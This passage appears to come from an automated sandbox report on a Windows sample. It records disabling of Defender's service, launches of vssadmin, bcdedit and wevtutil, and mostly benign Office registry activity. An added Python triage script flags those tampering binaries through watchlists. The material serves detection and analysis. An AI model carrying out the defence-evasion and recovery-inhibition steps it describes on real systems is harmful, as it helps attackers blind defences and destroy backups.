| File opened for modification | C:\Windows\Installer\f7777a0.mst | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A70.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7BDB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7777a0.mst | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI78F7.tmp | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
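Four of the defence-evasion and recovery-inhibition signatures above carry evidence rows: reg.exe setting the WinDefend service's `Start` value to `4` (SERVICE_DISABLED, so Defender will not start on the next boot), a run of MpCmdRun.exe, two launches of bcdedit.exe and one of vssadmin.exe. No command line was captured for the last three, so any detector built from this report has to key on the process name and the registry write rather than on arguments. The triage script below is an added example, not part of the report: it parses rows in the report's own `Description | Indicator | Process | Target` format (the sample rows are copied from the page, plus one WINWORD.EXE row as a benign control), and the service and binary watchlists with their ATT&CK labels are this example's assumptions.

```python
"""Triage 'Description | Indicator | Process | Target' rows for defence-evasion and
recovery-inhibition behaviour.

Added example, not part of the sandbox report. SAMPLE_ROWS are copied from the
report (plus one WINWORD.EXE row as a benign control); the watchlists and the
technique labels are this example's assumptions.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Set, Tuple

# Service start types (winnt.h): 0 boot, 1 system, 2 auto, 3 demand, 4 disabled.
SERVICE_DISABLED = 4

# Services whose Start value ransomware flips before encrypting (assumed watchlist).
WATCHED_SERVICES = {"windefend", "wdnissvc", "sense", "mpssvc", "wscsvc", "vss"}

# Built-in binaries whose launch in this context is a finding (assumed watchlist).
WATCHED_BINARIES = {
    "mpcmdrun.exe": "Defender command-line tool run (T1562.001)",
    "vssadmin.exe": "shadow copy tampering (T1490)",
    "bcdedit.exe": "boot configuration tampering (T1490)",
    "wbadmin.exe": "backup catalog tampering (T1490)",
    "wevtutil.exe": "event log clearing (T1070.001)",
    "sc.exe": "service control from the command line",
}

# Indicator shape: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
SERVICE_START_RE = re.compile(
    r'\\services\\(?P<svc>[^\\]+)\\Start\s*=\s*"(?P<val>\d+)"', re.IGNORECASE)

SAMPLE_ROWS = [
    "| Description | Indicator | Process | Target |",
    r"| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |",
    r'| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |',
    r"| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |",
    r"| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |",
    r"| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |",
    # benign control row from the same report: Office registering its HTML editor
    r'| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |',
]


@dataclass
class Finding:
    process: str   # executable basename, lower-cased
    reason: str


def parse_row(row: str) -> Optional[Tuple[str, str, str, str]]:
    """Split one table row into its four cells; None for anything that is not a row."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    return (cells[0], cells[1], cells[2], cells[3]) if len(cells) == 4 else None


def disabled_service(indicator: str) -> Optional[str]:
    """Name of a watched service that the indicator sets to SERVICE_DISABLED, else None."""
    m = SERVICE_START_RE.search(indicator)
    if m and m.group("svc").lower() in WATCHED_SERVICES and int(m.group("val")) == SERVICE_DISABLED:
        return m.group("svc")
    return None


def triage(rows) -> List[Finding]:
    """One finding per row that disables a watched service or launches a watched binary."""
    findings: List[Finding] = []
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        _desc, indicator, process, _target = parsed
        exe = PureWindowsPath(process).name.lower()
        svc = disabled_service(indicator)
        if svc:
            findings.append(Finding(exe, f"sets {svc} Start=4 (SERVICE_DISABLED): "
                                         f"service will not start on next boot (T1562.001)"))
        elif exe in WATCHED_BINARIES:
            findings.append(Finding(exe, WATCHED_BINARIES[exe]))
    return findings


def disabled_services(rows) -> Set[str]:
    """Set of watched services disabled anywhere in the rows."""
    names = set()
    for row in rows:
        parsed = parse_row(row)
        if parsed and disabled_service(parsed[1]):
            names.add(disabled_service(parsed[1]))
    return names


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.process:14} {f.reason}")
```

The WINWORD.EXE control row produces no finding, which is the point of running the watchlist against the whole table rather than eyeballing the signature names: the sample's own evasion is a handful of rows, the rest of the report is Office registering file handlers.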
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
